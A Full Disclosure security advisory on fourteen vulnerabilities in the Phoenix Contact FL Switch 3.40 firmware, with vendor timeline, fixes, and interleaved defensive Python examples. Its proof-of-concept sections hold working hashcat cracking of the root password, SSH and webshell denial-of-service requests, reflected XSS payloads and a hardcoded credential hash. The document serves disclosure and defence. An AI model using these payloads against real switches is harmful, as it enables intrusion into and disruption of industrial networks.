Message-ID: <PAXP190MB1647C0B1C4090CC0866E8112FEABA@PAXP190MB1647.EURP190.PROD.OUTLOOK.COM>
Date: Wed, 17 Dec 2025 14:11:32 +0000
From: Thomas Weber | CyberDanube via Fulldisclosure
 <fulldisclosure@...lists.org>
To: "fulldisclosure@...lists.org" <fulldisclosure@...lists.org>
Subject: [FD] CyberDanube Security Research 20251215-0 | Multiple
 Vulnerabilities in Phoenix Contact FL Switch Series

CyberDanube Security Research 20251215-0
-------------------------------------------------------------------------------
                title| Multiple Vulnerabilities
              product| FL Switch
   vulnerable version| 3.40
        fixed version| TODO
           CVE number| CVE-2025-41692, CVE-2025-41693, CVE-2025-41694,
                     | CVE-2025-41695, CVE-2025-41696, CVE-2025-41697,
                     | CVE-2025-41745, CVE-2025-41746, CVE-2025-41747,
                     | CVE-2025-41748, CVE-2025-41749, CVE-2025-41750,
                     | CVE-2025-41751, CVE-2025-41752
               impact| High
             homepage| https://www.phoenixcontact.com/
                found| 16.04.2025
                   by| D. Blagojevic, S. Dietz, F. Koroknai, T. Weber
                     | CyberDanube Security Research
                     | Vienna | St. Pölten
                     | This research was conducted in cooperation with Verbund
                     | OT Cyber Security Lab during a penetration test.
                     |
                     | https://www.cyberdanube.com
                     |
-------------------------------------------------------------------------------

Vendor description
-------------------------------------------------------------------------------
"What we do
Connecting, distributing, and controlling power and data flows - we have been
developing the right products for this purpose since 1923. Whether in
industrial production facilities, in the field of renewable energies, in
infrastructure, or for complex device connections: our solutions are used
wherever processes must run automatically. Above and beyond their pure
function, they help our partners to develop sustainable applications with more
efficient processes and reduced costs.

We are Phoenix Contact: With innovative products and solutions, we are paving
the way to a climate-neutral and sustainable world."

Source: https://www.phoenixcontact.com/en-us/company

Vulnerable versions
-------------------------------------------------------------------------------
Tested on FL SWITCH 2306-2SFP PN version 3.40

Find more information about affected products on the VDE Cert website:
https://certvde.com/de/advisories/VDE-2025-071

Vulnerability overview
-------------------------------------------------------------------------------
1) Weak/Predictable root Password (CVE-2025-41692)
The device's root password is generated with a weak ruleset. An attacker
with access to the administration password can brute-force it in seconds. The
"password" part of the root password is equal to the password set in the web
interface.


2) Authenticated Denial-of-Service via SSH (CVE-2025-41693)
The device is vulnerable to a denial-of-service condition when SSH is enabled.
An authenticated attacker can exploit this issue to make the device unresponsive.

3) Authenticated Denial-of-Service via Webshell (CVE-2025-41694)
The webshell is vulnerable to a denial of service condition. An authenticated
attacker can exploit this issue to make the webserver unresponsive.

4) Multiple Reflected Cross-Site Scripting Vulnerabilities (CVE-2025-41695,
CVE-2025-41745 - CVE-2025-41752)
Multiple GET and POST requests can be used to trigger reflected cross-site
scripting vulnerabilities. This can be used to execute malicious code in the
context of a user's browser. Cookies may also be stolen this way.

5) Hardcoded User Password (CVE-2025-41696)
The device's "user" account has weak hardcoded credentials. An attacker with
physical access could abuse this to gain serial access.

6) Access to UART Console (CVE-2025-41697)
The device exposes a UART console on the PCB, which allows an attacker to
interact with the Linux operating system. Based on vulnerability 5), an
attacker can log in to the system with the hardcoded credentials. This attack
requires physical access.

Proof of Concept
-------------------------------------------------------------------------------
1) Weak/Predictable root Password (CVE-2025-41692)
The root password is generated using the mask "<pw>\*[0-9][8]". The following
hashcat configuration can be used to calculate the password if administration
credentials are known.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
hashcat -m 500 -a 3 hash.txt password*?d?d?d?d?d?d?d?d --force
$1$Y8/euSU2$l42H5Fox4UvOIwt4cCyUL1:password*92016123

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 500 (md5crypt, MD5 (Unix), Cisco-IOS $1$ (MD5))
Hash.Target......: $1$Y8/euSU2$l42H5Fox4UvOIwt4cCyUL1
Time.Started.....: Mon Apr 14 13:25:20 2025, (3 secs)
Time.Estimated...: Mon Apr 14 13:25:23 2025, (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Mask.......: password*?d?d?d?d?d?d?d?d [17]
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   121.3 kH/s (59.56ms) @ Accel:4 Loops:250 Thr:256 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 399360/100000000 (0.40%)
Rejected.........: 0/399360 (0.00%)
Restore.Point....: 368640/100000000 (0.37%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:750-1000
Candidate.Engine.: Device Generator
Candidates.#1....: password*13636123 -> password*62273232
Hardware.Mon.#1..: Temp: 69c Util:100% Core: 210MHz Mem: 405MHz Bus:16
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
A possible password would be "SuperStrongPassword*92016123". It is generated
from the web interface password (SuperStrongPassword) followed by an asterisk
and an eight-digit number. The password is newly generated on each start of
the device, so once the web interface password is known, only the eight
digits remain to be guessed.

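The following Python is an added example and not part of the advisory: it quantifies what the mask above leaves to be guessed, using hashcat's mask notation and the 121.3 kH/s rate reported in the run above, and contrasts it with an assumed random 12-character printable password at the same speed. The charset sizes are hashcat's standard definitions; everything else is computed.

```python
# Added example (not from the advisory): estimate the work an attacker who
# already holds the web-interface password needs to recover the derived root
# password. Mask syntax follows hashcat; the 121.3 kH/s rate is the speed the
# advisory's run reported, the random-password mask is an assumed comparison.
import math

# Sizes of hashcat's built-in charsets (standard definitions).
CHARSET_SIZES = {
    "d": 10,   # ?d  0-9
    "l": 26,   # ?l  a-z
    "u": 26,   # ?u  A-Z
    "s": 33,   # ?s  printable specials
    "a": 95,   # ?a  all printable ASCII
}


def mask_keyspace(mask: str) -> int:
    """Number of candidates a hashcat brute-force mask expands to.

    Literal characters contribute a factor of 1, each ?x token multiplies
    by the size of charset x, and '??' is a literal question mark.
    """
    space = 1
    i = 0
    while i < len(mask):
        if mask[i] == "?" and i + 1 < len(mask):
            token = mask[i + 1]
            if token != "?":          # '??' stays a literal '?'
                space *= CHARSET_SIZES[token]
            i += 2
        else:
            i += 1
    return space


def entropy_bits(mask: str) -> float:
    """Entropy of the mask in bits, i.e. what the attacker still has to guess."""
    return math.log2(mask_keyspace(mask))


def worst_case_seconds(mask: str, rate_hps: float) -> float:
    """Time to exhaust the whole keyspace at a given hash rate (hashes/s)."""
    return mask_keyspace(mask) / rate_hps


def compare_schemes(rate_hps: float) -> dict:
    """Contrast the device's scheme with an assumed random 12-character
    printable password, both measured at the same cracking speed."""
    device_mask = "password*?d?d?d?d?d?d?d?d"   # the mask from the advisory
    random_mask = "?a" * 12                      # assumed alternative
    return {
        "device_bits": round(entropy_bits(device_mask), 1),
        "device_hours": worst_case_seconds(device_mask, rate_hps) / 3600,
        "random_bits": round(entropy_bits(random_mask), 1),
        "random_years": worst_case_seconds(random_mask, rate_hps) / (3600 * 24 * 365),
    }


if __name__ == "__main__":
    for key, value in compare_schemes(121_300).items():
        print(f"{key:>13}: {value:,.2f}")
```

The keyspace of the advisory's mask is exactly the 100000000 that hashcat reports as the progress denominator, i.e. about 26.6 bits; at the reported rate the whole space is exhausted in under a quarter of an hour on that hardware, which is why the scheme is rated weak even though the web password itself may be strong.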
-------------------------------------------------------------------------------
2) Authenticated Denial-of-Service via SSH (CVE-2025-41693)
The Dropbear SSH server is modified by the manufacturer. When SSH is used to
execute a command directly at login, the pxc_cli process that handles the
session stays open and keeps using resources. After ~6 connections the device
becomes unresponsive.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
attacker$ ssh <known_user>@<IP> echo DOS

switch$ top
Mem: 62024K used, 62996K free, 0K shrd, 0K buff, 21576K cached
CPU:  13% usr  86% sys   0% nic   0% idle   0% io   0% irq   0% sirq
Mem: 63016K used, 62004K free, 0K shrd, 0K buff, 21576K cached
CPU:  12% usr  86% sys   0% nic   0% idle   0% io   0% irq   0% sirq
Load average: 6.97 3.47 1.44 7/190 1393
  PID  PPID USER     STAT   VSZ %VSZ CPU %CPU COMMAND
 1163  1162 root     R     6896   6%   0  14% /usr/bin/pxc_cli -ssh
 1246  1244 root     R     6896   6%   0  14% /usr/bin/pxc_cli -ssh
 1294  1293 root     R     6896   6%   0  14% /usr/bin/pxc_cli -ssh
 1233  1232 root     R     6896   6%   0  14% /usr/bin/pxc_cli -ssh
 1255  1254 root     R     6896   6%   0  14% /usr/bin/pxc_cli -ssh
 1385  1384 root     R     6892   6%   0  14% /usr/bin/pxc_cli -ssh
 1121  1093 apache   S    24752  20%   0   7% /usr/bin/php -c /dev/shm/php.ini
  842     1 root     S     877m 718%   0   6% /usr/bin/pxc_mona -o
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

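As an added illustration (not part of the advisory), the Python below parses a top(1) snapshot like the one above and raises an alert when pxc_cli -ssh processes pile up or the load average climbs, which is what a monitoring check on the switch, or on a collector fed with its process list, could watch for. The busy sample is copied from the advisory's output; the quiet sample and the thresholds are assumed.

```python
# Added example (not from the advisory): detect lingering SSH CLI sessions
# and CPU saturation in a top(1) snapshot. BUSY_SNAPSHOT is copied from the
# advisory; QUIET_SNAPSHOT and the thresholds are constructed assumptions.
import re

BUSY_SNAPSHOT = """\
Mem: 62024K used, 62996K free, 0K shrd, 0K buff, 21576K cached
CPU:  13% usr  86% sys   0% nic   0% idle   0% io   0% irq   0% sirq
Load average: 6.97 3.47 1.44 7/190 1393
  PID  PPID USER     STAT   VSZ %VSZ CPU %CPU COMMAND
 1163  1162 root     R     6896   6%   0  14% /usr/bin/pxc_cli -ssh
 1246  1244 root     R     6896   6%   0  14% /usr/bin/pxc_cli -ssh
 1294  1293 root     R     6896   6%   0  14% /usr/bin/pxc_cli -ssh
 1233  1232 root     R     6896   6%   0  14% /usr/bin/pxc_cli -ssh
 1255  1254 root     R     6896   6%   0  14% /usr/bin/pxc_cli -ssh
 1385  1384 root     R     6892   6%   0  14% /usr/bin/pxc_cli -ssh
 1121  1093 apache   S    24752  20%   0   7% /usr/bin/php -c /dev/shm/php.ini
  842     1 root     S     877m 718%   0   6% /usr/bin/pxc_mona -o
"""

# Constructed healthy baseline for comparison (assumed values).
QUIET_SNAPSHOT = """\
CPU:   2% usr   3% sys   0% nic  95% idle   0% io   0% irq   0% sirq
Load average: 0.12 0.08 0.05 1/120 900
  PID  PPID USER     STAT   VSZ %VSZ CPU %CPU COMMAND
  842     1 root     S     877m 718%   0   1% /usr/bin/pxc_mona -o
  901   900 root     S     6896   6%   0   0% /usr/bin/pxc_cli -ssh
"""

# One busybox-style process row: PID PPID USER STAT VSZ %VSZ CPU %CPU COMMAND
PROCESS_RE = re.compile(
    r"^\s*(?P<pid>\d+)\s+(?P<ppid>\d+)\s+(?P<user>\S+)\s+(?P<stat>\S+)\s+"
    r"(?P<vsz>\S+)\s+(?P<vszp>\S+)\s+(?P<cpu>\d+)\s+(?P<cpup>\d+)%\s+(?P<cmd>.+)$"
)
LOAD_RE = re.compile(r"^Load average:\s+([\d.]+)")
IDLE_RE = re.compile(r"^CPU:.*?(\d+)% idle")


def parse_top(text: str) -> dict:
    """Extract the 1-minute load, the idle CPU percentage and the process table."""
    snapshot = {"load1": None, "idle": None, "procs": []}
    for line in text.splitlines():
        if (m := LOAD_RE.match(line)):
            snapshot["load1"] = float(m.group(1))
        elif (m := IDLE_RE.match(line)):
            snapshot["idle"] = int(m.group(1))
        elif (m := PROCESS_RE.match(line)):
            proc = m.groupdict()
            proc["cpup"] = int(proc["cpup"])
            snapshot["procs"].append(proc)
    return snapshot


def lingering_sessions(procs: list, marker: str = "pxc_cli -ssh") -> list:
    """CLI back-end processes spawned for SSH sessions."""
    return [p for p in procs if marker in p["cmd"]]


def evaluate(text: str, max_sessions: int = 3, max_load: float = 4.0,
             min_idle: int = 5) -> dict:
    """Return findings; 'alert' is True when any (assumed) threshold is exceeded."""
    snap = parse_top(text)
    sessions = lingering_sessions(snap["procs"])
    findings = []
    if len(sessions) > max_sessions:
        findings.append(f"{len(sessions)} pxc_cli -ssh processes (limit {max_sessions})")
    if snap["load1"] is not None and snap["load1"] > max_load:
        findings.append(f"load average {snap['load1']} (limit {max_load})")
    if snap["idle"] is not None and snap["idle"] < min_idle:
        findings.append(f"CPU idle {snap['idle']}% (minimum {min_idle}%)")
    return {"alert": bool(findings), "findings": findings, "sessions": len(sessions)}


if __name__ == "__main__":
    for name, sample in (("busy", BUSY_SNAPSHOT), ("quiet", QUIET_SNAPSHOT)):
        print(name, evaluate(sample))
```

On the advisory's snapshot all three checks fire (six sessions, load 6.97, 0% idle); the same logic applied to a periodic process dump is a cheap early warning that a switch is being pushed toward the unresponsive state described above.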
-------------------------------------------------------------------------------
3) Authenticated Denial-of-Service via Webshell (CVE-2025-41694)
When the webshell receives an empty command consisting only of whitespace, the
server blocks until it receives more data, resulting in a DoS condition.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
$ curl "http://192.168.19.143/php/command.php?usr=admin&pwd=password&cmd=%20"

$ curl -vv "http://192.168.19.143/php/command.php?usr=admin&pwd=password&cmd=%20"
*   Trying 192.168.19.143:80...
* Connected to 192.168.19.143 (192.168.19.143) port 80
> GET /php/command.php?usr=admin&pwd=password&cmd=%20 HTTP/1.1
> Host: 192.168.19.143
> User-Agent: curl/8.5.0
> Accept: */*
>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

-------------------------------------------------------------------------------
4) Multiple Reflected Cross-Site Scripting Vulnerabilities (CVE-2025-41695,
CVE-2025-41745 - CVE-2025-41752)
The reflected cross-site scripting vulnerabilities can be triggered by using
the following POST requests.
Dyn Conn Example (CVE-2025-41695):
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
POST /php/dyn_conn.php HTTP/1.1
Host: 192.168.19.143
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: PHPSESSID=<redacted>
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Type: application/x-www-form-urlencoded
Content-Length: 57

objSave=%3Cscript%3Ealert(document%2elocation)%3C/script%3E
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Port Cntr Example (CVE-2025-41745):
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
POST /php/pxc_portCntr2.php HTTP/1.1
Host: 192.168.19.143
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: PHPSESSID=<redacted>
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Type: application/x-www-form-urlencoded
Content-Length: 87

btn_clear=1&activeTab=1"></script><script>alert(document.location)</script><script>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Port Sec Example (CVE-2025-41746):
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
POST /php/pxc_portSecCfg.php HTTP/1.1
Host: 192.168.19.143
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: PHPSESSID=<redacted>
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Type: application/x-www-form-urlencoded
Content-Length: 98

portSelect=1%22%3E%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E%3Cscript%3E
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Vlan Intf Example (CVE-2025-41747):
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
POST /php/pxc_vlanIntfCfg.php HTTP/1.1
Host: 192.168.19.143
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: PHPSESSID=<redacted>
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Type: application/x-www-form-urlencoded
Content-Length: 109

btn_apply=1&activeInf=1%22%3E%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E%3Cscript%3E
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
GET Requests for triggering XSS:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
(CVE-2025-41748)
http://192.168.19.143/php/pxc_Dot1xCfg.php?port=1%22%3E%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E%3Cscript%3E
(CVE-2025-41749)
http://192.168.19.143/php/port_util.php?portSelect=1%22%3E%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E%3Cscript%3E
(CVE-2025-41750)
http://192.168.19.143/php/pxc_PortCfg.php?port=1%22%3E%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E%3Cscript%3E
(CVE-2025-41751)
http://192.168.19.143/php/pxc_portCntr.php?port=1%22%3E%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E%3Cscript%3E
(CVE-2025-41752)
http://192.168.19.143/php/pxc_portSfp.php?port=1%22%3E%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E%3Cscript%3E
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

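The requests above reflect a parameter into two different contexts: objSave lands in the HTML body, while activeTab, portSelect, activeInf and port are closed off with 1"></script>, i.e. they are written into a JavaScript string literal inside a <script> block. The Python below is an added example, not code from the advisory or from Phoenix Contact: two hypothetical templates stand in for the affected PHP pages, each shown beside the encoding that neutralises the page's own payloads in that context.

```python
# Added example (not from the advisory): context-correct output encoding for
# the two reflection contexts seen in the PoC requests. The payloads are the
# advisory's, URL-decoded; the templates are hypothetical stand-ins for the
# PHP pages, not the vendor's code.
import html
import json

BODY_PAYLOAD = "<script>alert(document.location)</script>"                         # objSave
SCRIPT_PAYLOAD = '1"></script><script>alert(document.location)</script><script>'  # activeTab, port, ...


# --- vulnerable renderings: the parameter is concatenated unencoded ---------
def render_body_vulnerable(obj_save: str) -> str:
    return f"<p>Object saved: {obj_save}</p>"


def render_script_vulnerable(active_tab: str) -> str:
    return f'<script>var activeTab = "{active_tab}";</script>'


# --- hardened renderings ---------------------------------------------------
def render_body_hardened(obj_save: str) -> str:
    # HTML-body context: entity-encode < > & " and ' (htmlspecialchars-style).
    return f"<p>Object saved: {html.escape(obj_save, quote=True)}</p>"


def js_string_literal(value: str) -> str:
    """Encode a value as a JavaScript string literal for use inside <script>.

    JSON encoding handles quotes, backslashes and control characters (and,
    with ensure_ascii, all non-ASCII including U+2028/U+2029); the extra
    replacements keep < > & out of the literal so the text can never close
    the <script> element regardless of what the HTML parser sees.
    """
    literal = json.dumps(value)
    for ch, esc in (("<", "\\u003c"), (">", "\\u003e"), ("&", "\\u0026")):
        literal = literal.replace(ch, esc)
    return literal


def render_script_hardened(active_tab: str) -> str:
    # Script context: emit a proper literal instead of quoting by hand.
    return f"<script>var activeTab = {js_string_literal(active_tab)};</script>"


def script_tag_count(page: str) -> int:
    """Number of '<script' openers in the page; a reflected value must never add one."""
    return page.lower().count("<script")


if __name__ == "__main__":
    for label, page in (
        ("body vulnerable", render_body_vulnerable(BODY_PAYLOAD)),
        ("body hardened", render_body_hardened(BODY_PAYLOAD)),
        ("script vulnerable", render_script_vulnerable(SCRIPT_PAYLOAD)),
        ("script hardened", render_script_hardened(SCRIPT_PAYLOAD)),
    ):
        print(f"{label:>18}: {script_tag_count(page)} <script> tag(s): {page}")
```

The count of <script> openers makes the difference visible: the vulnerable templates turn the page's payloads into one and three script blocks respectively, the hardened ones leave the attacker's text as inert data (and js_string_literal round-trips through json.loads, so the JavaScript still receives the original value).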
-------------------------------------------------------------------------------
5) Hardcoded User Password (CVE-2025-41696)
The shadow file shows the hardcoded credential of "user". The hash corresponds
to the password "user".

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
$ cat /etc/shadow
[...]
mailman:!!:11851:0:99999:7:::
mysql:!!:11851:0:99999:7:::
ldap:!!:11851:0:99999:7:::
pvm:!!:11851:0:99999:7:::
user:$1$pJefShJL$CoX8T20vn1g.ug0jZIczM.:11851:0:99999:7:::
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

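Two things in that excerpt are worth checking automatically on any firmware image: which accounts can actually log in, and whether their password metadata betrays a build-time default. The Python below is an added example (not from the advisory): it parses the shadow lines quoted above, flags login-capable accounts that still use md5crypt, and notes that every entry carries the same last-change day, which here decodes to a date in 2002.

```python
# Added example (not from the advisory): audit a shadow file for accounts that
# can log in, the hash algorithm they use, and password-age fields that look
# baked into the image. SHADOW_SAMPLE is copied from the advisory's excerpt.
from datetime import date, timedelta

SHADOW_SAMPLE = """\
mailman:!!:11851:0:99999:7:::
mysql:!!:11851:0:99999:7:::
ldap:!!:11851:0:99999:7:::
pvm:!!:11851:0:99999:7:::
user:$1$pJefShJL$CoX8T20vn1g.ug0jZIczM.:11851:0:99999:7:::
"""

# crypt(3) hash identifiers: (prefix, name, considered weak today)
HASH_ALGORITHMS = [
    ("$1$", "md5crypt", True),      # legacy, cheap to brute-force
    ("$2", "bcrypt", False),        # $2a$ / $2b$ / $2y$
    ("$5$", "sha256crypt", False),
    ("$6$", "sha512crypt", False),
    ("$7$", "scrypt", False),
    ("$y$", "yescrypt", False),
]


def parse_shadow(text: str) -> list:
    """Return name, hash field and last-change day for each 9-field line."""
    entries = []
    for line in text.splitlines():
        fields = line.strip().split(":")
        if len(fields) != 9:             # skips "[...]" markers and junk
            continue
        entries.append({
            "name": fields[0],
            "hash": fields[1],
            "lastchg": int(fields[2]) if fields[2] else None,
        })
    return entries


def is_locked(hash_field: str) -> bool:
    """'!', '!!' and '*' mean no password login is possible."""
    return hash_field.startswith(("!", "*"))


def hash_algorithm(hash_field: str) -> tuple:
    """Map a hash to (algorithm name, weak?)."""
    for prefix, name, weak in HASH_ALGORITHMS:
        if hash_field.startswith(prefix):
            return name, weak
    if len(hash_field) == 13:            # traditional DES crypt
        return "descrypt", True
    return "unknown", True


def lastchg_date(days: int) -> date:
    """shadow(5) stores the last change as days since 1970-01-01."""
    return date(1970, 1, 1) + timedelta(days=days)


def audit(text: str) -> list:
    """List (account, issue) pairs for login-capable or suspicious entries."""
    entries = parse_shadow(text)
    distinct_ages = {e["lastchg"] for e in entries}
    findings = []
    for e in entries:
        if e["hash"] == "":
            findings.append((e["name"], "empty password field: login without a password"))
            continue
        if is_locked(e["hash"]):
            continue
        name, weak = hash_algorithm(e["hash"])
        if weak:
            findings.append((e["name"], f"login-capable account with weak {name} hash"))
        if e["lastchg"] is not None and len(distinct_ages) == 1:
            findings.append((e["name"],
                             f"password age identical to every other account, set "
                             f"{lastchg_date(e['lastchg'])}: likely baked into the image"))
    return findings


if __name__ == "__main__":
    for account, issue in audit(SHADOW_SAMPLE):
        print(f"{account}: {issue}")
```

On the quoted excerpt only "user" is login-capable; it uses md5crypt (the same $1$ scheme the root password above was cracked against) and shares the 11851-day last-change stamp with the locked system accounts, which is the signature of a credential shipped inside the firmware rather than set on the device.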
-------------------------------------------------------------------------------
6) Access to UART Console (CVE-2025-41697)
Two vias next to the "LC125A Quadruple Bus Buffer Gate" on an edge of the PCB
expose the RxD and TxD UART pins. These pins can be interfaced with a
UART-to-USB converter via its RxD and TxD pins. The needed settings are
38400 Baud, 1n8, at 3.3 Volt.

Solution
-------------------------------------------------------------------------------
Update to the latest available firmware (3.50 and newer).


Workaround
-------------------------------------------------------------------------------
Restrict network access to the device.


Recommendation
-------------------------------------------------------------------------------
Apply patches immediately.


Contact Timeline
-------------------------------------------------------------------------------
2025-07-17: Sent advisory to Phoenix Contact PSIRT.
2025-07-29: Vendor asked for a call to clarify the vulnerabilities.
2025-07-31: Aligned on timeline for September during call.
2025-08-19: Vendor confirmed publications for 2025-10-14. Confirmed the
            shift.
2025-09-25: Asked the vendor for another call to clarify details regarding all
            affected devices (including other advisories).
2025-09-26: Talked to vendor to clarify details.
2025-10-09: Asked for CVE Numbers. Received and included them in the advisory.
2025-10-14: Coordinated publication of security advisory.
2025-11-18: Phone call with Phoenix Contact; shifted publishing date to
            2025-12-09 due to discussions with CERT@VDE regarding risk rating.
2025-12-09: Received CVE numbers for XSS vulnerabilities from Phoenix Contact.
2025-12-15: Coordinated release of security advisory.

Web: https://www.cyberdanube.com
Twitter: https://twitter.com/cyberdanube
Mail: research at cyberdanube dot com

EOF T.Weber / @2025
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
